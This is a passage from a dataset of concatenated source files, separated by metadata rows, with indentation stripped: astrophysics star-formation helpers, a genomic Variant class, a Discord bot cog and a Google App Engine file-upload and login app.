vels = vels[boolidx].copy()
return C, C_vel
# -----------------------------------------------------------------
## This private helper function returns the unit vector pointing in the direction of the rotation
# axis for input particle data, input CoM and input mean velocity. apt specifies an aperture to
# consider particles within in the units of pos, and aptfrac defines and inner radius within which to
# exclude particles in units of apt.
def rotAxis(crds, vels, mass, com, v_bar, apt = 3e4, aptfrac = 0.08):
# put in centre of mass and rest frame
pos = crds - com
v_rel = vels - v_bar
# calculate apertures
disp = (pos**2).sum(axis=-1)
outapt = disp < apt ** 2
inapt = disp > (aptfrac * apt) ** 2
totapt = inapt * outapt
# calculate J vectors in arbitrary units
Js = np.cross(pos[totapt], v_rel[totapt]) * np.column_stack([mass[totapt]]*3)
# calculate net J vector and normalise to unit vector
J = Js.sum(axis = 0)
norm2 = np.dot(J, J).sum()
if norm2 > 0: return J * norm2 ** -0.5
else: return np.array((0,0,1))
# -----------------------------------------------------------------
## This private helper function applies a spherical aperture to a dictionary of particle data, i.e. it
# adjusts the dictionary so that the particles outside the aperture are removed from each array.
def applyAperture(data, radius):
x,y,z = data['r'].T
inside = (x*x+y*y+z*z) <= (radius*radius)
if inside.any():
for key in data:
data[key] = data[key][inside]
else:
for key in data:
shape = list(data[key].shape)
shape[0] = 0
data[key] = np.zeros(shape)
# -----------------------------------------------------------------
## This private helper function reads the Schmidt parameters into a python structure.
def schmidtParameters(params):
# extract relevent unit conversions
CM_PER_MPC = params['CM_PER_MPC']
GAMMA = params['GAMMA']
GRAV = params['GRAVITY']
K_B = params['BOLTZMANN']
M_PROTON = params['PROTONMASS']
M_SUN = params['SOLAR_MASS']
SEC_PER_YEAR = params['SEC_PER_YEAR']
# extract relevent runtime parameters used to create EAGLE snapshot
GammaEff = params['EOS_Jeans_GammaEffective']
InitH = params['InitAbundance_Hydrogen']
RhoHi = params['SF_SchmidtLawHighDensThresh_HpCM3']
RhoNorm = params['EOS_NormPhysDens_HpCM3']
SchmidtCoeff = params['SF_SchmidtLawCoeff_MSUNpYRpKPC2']
SchmidtExp = params['SF_SchmidtLawExponent']
SchmidtExpHi = params['SF_SchmidtLawHighDensExponent']
T_JeansNorm = params['EOS_Jeans_TempNorm_K']
# Normalisation in cgs units
Norm_cgs = SchmidtCoeff * pow(pow(CM_PER_MPC / 1.e6, 2) / M_SUN , SchmidtExp - 1) / (1.e6 * SEC_PER_YEAR)
# High density Threshold
RhoHi_cgs = RhoHi * M_PROTON / InitH
# Density normalisation in cgs
RhoNorm_cgs = RhoNorm * M_PROTON / InitH
# Min total Pressure
P_totc = RhoNorm * T_JeansNorm * K_B / (InitH * 1.22)
# Pressure at high density Schmidt law break
PBreak_cgs = P_totc * (RhoHi/RhoNorm) ** GammaEff
# Assume f_g = 1
NormHi_cgs = Norm_cgs * (GAMMA * PBreak_cgs / GRAV) ** ((SchmidtExp - SchmidtExpHi) * 0.5)
# tuple of universal SF parameters
sfparams = RhoNorm_cgs, RhoHi_cgs, P_totc, PBreak_cgs, GammaEff
# tuples of high and low pressure SF parameters
sf_lo = Norm_cgs, GAMMA/GRAV, SchmidtExp
sf_hi = NormHi_cgs, GAMMA/GRAV, SchmidtExpHi
return sfparams, sf_lo, sf_hi
# -----------------------------------------------------------------
## This private helper function obtains the SFR of gas from which star particles formed.
#
# Inputs:
# - rho_form: gas density at formation of star particle
# - mass: mass of star particle
# - schmidtpars: parameters for implementing Schmidt law from schmidtParameters()
#
# Outputs:
# - SFR = Star formation rate for gas particle in input mass units per year
#
def getSFR(rho_form, mass, schmidtpars):
# unpack universal SF law parameters
RhoNorm_cgs, RhoHi_cgs, P_totc, PBreak_cgs, GammaEff = schmidtpars[0]
# Pressure at star formation
P_form = P_totc * (rho_form / RhoNorm_cgs) ** GammaEff
# unpack high and low pressure SF law parameters
sf_lo, sf_hi = schmidtpars[1:]
# calculate SFR
if type(rho_form) == np.ndarray:
hidx = rho_form > RhoHi_cgs
SFR = np.zeros(rho_form.size)
if np.any(hidx):
SFR[hidx] = mass[hidx] * sf_hi[0] * (sf_hi[1] * P_form[hidx]) ** ((sf_hi[2] - 1) * 0.5)
if np.any(-hidx):
SFR[-hidx] = mass[-hidx] * sf_lo[0] * (sf_lo[1] * P_form[-hidx]) ** ((sf_lo[2] - 1) * 0.5)
else:
if rho_form > RhoHi_cgs:
SFR = mass * sf_hi[0] * (sf_hi[1] * P_form) ** ((sf_hi[2] - 1) * 0.5)
else:
SFR = mass * sf_lo[0] * (sf_lo[1] * P_form) ** ((sf_lo[2] - 1) * 0.5)
# return SFR converted to input mass units per year from per second
return np.array(SFR) * 3.15569e7
# -----------------------------------------------------------------
## This private helper function obtains the ambient pressure of gas from which star particles formed.
#
# Inputs:
# - rho: gas density of star forming particle
# - schmidtpars: parameters for implementing Schmidt law from schmidtParameters()
#
# Outputs:
# - P_tot: Ambient pressure from polytropic effective EoS (Schaye & Dalla Vecchia (2004))
#
def getPtot(rho, schmidtpars):
RhoNorm_cgs, RhoHi_cgs, P_totc, PBreak_cgs, GammaEff = schmidtpars[0]
P_form = P_totc * (rho / RhoNorm_cgs) ** GammaEff
return P_form
# -----------------------------------------------------------------
## This private helper function samples star forming gas particles into a number of sub-particles.
#
# Inputs:
# - sfr: star formation rate in solar masses per yr
# - m_gas: particle mass in solar masses
#
# Outputs:
# - nested arrays with a list of subparticles for each parent input particle:
# - ms: sub-particle stellar masses in solar masses
# - ts: lookback times of sub-particle formation
# - idxs: index of the sub-particle's parent particle in input array
# - mdiffs: mass of parent particles locked up in new stars; this can be subtracted from the parent gas
# particles for mass conservation
#
def stochResamp(sfr, m_gas):
# mass resampling parameters (see Kennicutt & Evans 2012 section 2.5)
m_min = 700 # minimum mass of sub-particle in M_solar
m_max = 1e6 # maximum mass of sub-particle in M_solar
alpha = 1.8 # exponent of power-law mass function
alpha1 = 1. - alpha
# age resampling parameters
thresh_age = 1e8 # period over which to resample in yr (100 Myr)
# initialise lists for output
ms = [[]]
ts = [[]]
idxs = [[]]
mdiffs = []
# for each parent particle, determine the star-forming sub-particles
for i in range(sfr.size):
sfri = sfr[i]
mi = m_gas[i]
# determine the maximum number of sub-particles based on the minimum sub-particle mass
N = int(max(1,np.ceil(mi/m_min)))
# generate random sub-particle masses from a power-law distribution between min and max values
X = np.random.random(N)
m = (m_min**alpha1 + X*(m_max**alpha1-m_min**alpha1))**(1./alpha1)
# limit and normalize the list of sub-particles to the total mass of the parent
mlim = m[np.cumsum(m)<=mi]
if len(mlim)<1: mlim = m[:1]
m = mi/mlim.sum() * mlim
N = len(m)
# generate random decay lookback time for each sub-particle
X = np.random.random(N) # X in range (0,1]
t = thresh_age + mi/sfri * np.log(1-X)
# determine mask for sub-particles that form stars by present day
issf = t > 0.
# add star-forming sub-particles to the output lists
ms.append(m[issf])
ts.append(t[issf])
idxs.append([i]*np.count_nonzero(issf))
mdiffs.append(m[issf].sum())
# convert sub-particle lists into numpy arrays
ms = np.hstack(ms)
ts = np.hstack(ts)
idxs = np.hstack(idxs).astype(int)
mdiffs = np.array(mdiffs)
return ms, ts, idxs, mdiffs
# -----------------------------------------------------------------
## This private helper function randomly shifts the positions of HII region sub-particles
# within the smoothing sphere of their parent.
#
# Arguments:
# - r: parent positions; updated by this function to the shifted positions
# - h: the smoothing lengths of the parents
# - h_mapp: the smoothing lengths of the sub-particles
#
def stochShiftPos(r, h, h_mapp):
# the offset sampling smoothing length is determined so that in the limit of infinite particles,
# the light distribution is the same as the parent particle kernel;
# assuming Gaussian kernels this means h_sampling**2 + h_mapp**2 = h**2.
h_sampling = np.sqrt(np.maximum(0,h*h - h_mapp*h_mapp))
# sample the offset from a scaled gaussian that resembles a cubic spline kernel
# (see the documentation of the SPHDustDistribution class in SKIRT)
r[:,0] += h_sampling * np.random.normal(scale=0.29, size=h_sampling.shape)
r[:,1] += h_sampling * np.random.normal(scale=0.29, size=h_sampling.shape)
r[:,2] += h_sampling * np.random.normal(scale=0.29, size=h_sampling.shape)
# -----------------------------------------------------------------
| agpl-3.0 | 7,663,827,819,299,570,000 | 47.719407 | 167 | 0.605166 | false | 3.252517 | false | false | false |
blachlylab/mucor | variant.py | 1 | 1480 | # Copyright 2013-2015 James S Blachly, MD and The Ohio State University
#
# This file is part of Mucor.
#
# Mucor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mucor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mucor. If not, see <http://www.gnu.org/licenses/>.
# variant.py
from __future__ import print_function
class Variant:
'''Data about SNV and Indels'''
def __init__(self,source,sample,pos,ref,alt,frac,dp, eff,fc):
self.source = source # source of variant - typically a filename
self.sample = sample # sample ID, as defined in the VCF
self.pos = pos # HTSeq.GenomicPosition
self.ref = ref
self.alt = alt
self.frac = frac
self.dp = dp
self.eff = eff
self.fc = fc
def __str__(self):
out = ""
for k,v in {'source':self.source, 'sample':self.sample, 'pos':self.pos, 'ref':self.ref, 'alt':self.alt, 'frac':self.frac, 'dp':self.dp, 'eff':self.eff, 'fc':self.fc}.items():
out += k + ":\t" + str(v) + "\n"
return out.strip()
| gpl-3.0 | -2,474,534,786,272,326,000 | 37.947368 | 176 | 0.666892 | false | 3.162393 | false | false | false |
BeatButton/beattie | cogs/default.py | 2 | 2318 | from io import BytesIO
import discord
from discord import File, Member
from discord.ext import commands
from discord.ext.commands import Cog
from bot import BeattieBot
from context import BContext
class Default(Cog):
"""Default useful commands."""
@commands.command()
async def avatar(self, ctx: BContext, *, user: Member = None) -> None:
target: discord.abc.User
if user is None:
target = ctx.author
else:
target = user
img = BytesIO()
avatar = target.avatar_url_as(
format="gif" if target.is_avatar_animated() else "png"
)
await avatar.save(img)
filename = str(avatar).rpartition("/")[2].partition("?")[0]
await ctx.send(file=File(img, filename))
@avatar.error
async def avatar_error(self, ctx: BContext, exc: Exception) -> None:
if isinstance(exc, commands.BadArgument):
await ctx.send("User not found.")
else:
await ctx.bot.handle_error(ctx, exc)
@commands.command()
async def latency(self, ctx: BContext) -> None:
"""Get the latency to the websocket."""
await ctx.send(f"WS latency: **{ctx.bot.latency*1000:.0f}ms**")
@commands.command()
async def ping(self, ctx: BContext) -> None:
"""Get how fast the bot reacts to a command message"""
msg = await ctx.send("...")
delta = msg.created_at - ctx.message.created_at
await msg.edit(content=f":ping_pong: **{delta.total_seconds()*1000:.0f}ms**")
msg = await ctx.channel.fetch_message(msg.id)
edited_at = msg.edited_at
assert edited_at is not None
delta2 = edited_at - ctx.message.created_at
await msg.edit(
content=f"{msg.content}\n**{delta2.total_seconds()*1000:.0f}ms**"
)
@commands.command()
async def source(self, ctx: BContext) -> None:
"""Get the source for the bot."""
await ctx.send("https://github.com/BeatButton/beattie")
@commands.command()
async def invite(self, ctx: BContext) -> None:
"""Get the invite for the bot."""
url = "<https://discordapp.com/oauth2/authorize?client_id={}&scope=bot>"
await ctx.send(url.format(ctx.me.id))
def setup(bot: BeattieBot) -> None:
bot.add_cog(Default())
| mit | 623,262,135,659,280,500 | 32.594203 | 85 | 0.609577 | false | 3.638932 | false | false | false |
shashanksingh/android_video_streamer | mineral-hangar-418/main.py | 1 | 2978 | import os
import urllib
import webapp2
import webapp2_extras.appengine.auth.models
from webapp2_extras import security
from webapp2_extras.appengine.auth.models import User
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
class MainHandler(webapp2.RequestHandler):
def get(self):
upload_url = blobstore.create_upload_url('/upload')
self.response.out.write('<html><body>')
self.response.out.write('<form action="%s" method="POST" enctype="multipart/form-data">' % upload_url)
self.response.out.write("""Upload File: <input type="file" name="file"><br> <input type="submit"
name="submit" value="Submit"> </form></body></html>""")
class UploadHandler(blobstore_handlers.BlobstoreUploadHandler):
def post(self):
upload_files = self.get_uploads('file') # 'file' is file upload field in the form
blob_info = upload_files[0]
self.redirect('/serve/%s' % blob_info.key())
class ServeHandler(blobstore_handlers.BlobstoreDownloadHandler):
def get(self, resource):
resource = str(urllib.unquote(resource))
blob_info = blobstore.BlobInfo.get(resource)
self.send_blob(blob_info)
class LoginHandler(webapp2.RequestHandler):
def post(self):
"""
username: Get the username from POST dict
password: Get the password from POST dict
"""
username = self.request.POST.get('username')
password = self.request.POST.get('password')
# Try to login user with password
# Raises InvalidAuthIdError if user is not found
# Raises InvalidPasswordError if provided password doesn't match with specified user
try:
self.auth.get_user_by_password(username, password)
except (InvalidAuthIdError, InvalidPasswordError), e:
# Returns error message to self.response.write in the BaseHandler.dispatcher
# Currently no message is attached to the exceptions
return e
class SignupHandler(webapp2.RequestHandler):
def post(self):
"""
username: Get the username from POST dict
password: Get the password from POST dict
"""
username = self.request.POST.get('username')
password = self.request.POST.get('password')
# Try to login user with password
# Raises InvalidAuthIdError if user is not found
# Raises InvalidPasswordError if provided password doesn't match with specified user
try:
self.auth.create_user_by_password(username, password)
except (InvalidAuthIdError, InvalidPasswordError), e:
# Returns error message to self.response.write in the BaseHandler.dispatcher
# Currently no message is attached to the exceptions
return e
app = webapp2.WSGIApplication([('/', MainHandler),
('/upload', UploadHandler),
('/serve/([^/]+)?', ServeHandler),
('/signup',SignupHandler),
('/login',LoginHandler)],
debug=True)
| gpl-3.0 | -323,633,904,016,594,000 | 39.794521 | 106 | 0.684352 | false | 4.176718 | false | false | false |